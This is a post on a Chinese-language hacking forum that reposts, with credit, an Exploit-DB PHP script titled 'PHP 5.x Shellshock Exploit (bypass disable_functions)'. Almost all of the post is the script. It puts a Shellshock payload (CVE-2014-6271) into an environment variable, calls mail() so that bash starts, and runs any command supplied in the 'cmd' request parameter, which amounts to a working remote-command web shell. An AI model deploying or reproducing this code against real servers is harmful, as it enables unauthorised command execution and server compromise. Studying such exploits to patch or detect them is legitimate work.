搜索
查看: 728|回复: 0

PHP 5.x - Bypass Disable Functions (via Shellshock)

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-11-18 19:20:48 | 显示全部楼层 |阅读模式
  1. # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
  2. # Google Dork: none
  3. # Date: 10/31/2014
  4. # Exploit Author: Ryan King (Starfall)
  5. # Vendor Homepage: http://php.net
  6. # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
  7. # Version: 5.* (tested on 5.6.2)
  8. # Tested on: Debian 7 and CentOS 5 and 6
  9. # CVE: CVE-2014-6271

  10. <?php
  11. function shellshock($cmd) { // Execute a command via CVE-2014-6271 @
  12. mail.c:283
  13.    if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
  14.      $tmp = tempnam(".","data");
  15.      putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
  16.      // In Safe Mode, the user may only alter environment variables
  17. whose names
  18.      // begin with the prefixes supplied by this directive.
  19.      // By default, users will only be able to set environment variables
  20. that
  21.      // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
  22. empty,
  23.      // PHP will let the user modify ANY environment variable!
  24.      mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually
  25. send any mail
  26.    }
  27.    else return "Not vuln (not bash)";
  28.    $output = @file_get_contents($tmp);
  29.    @unlink($tmp);
  30.    if($output != "") return $output;
  31.    else return "No output, or not vuln.";
  32. }
  33. shellshock($_REQUEST["cmd"]);
  34. ?>
复制代码

from:http://www.exploit-db.com/exploits/35146/
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表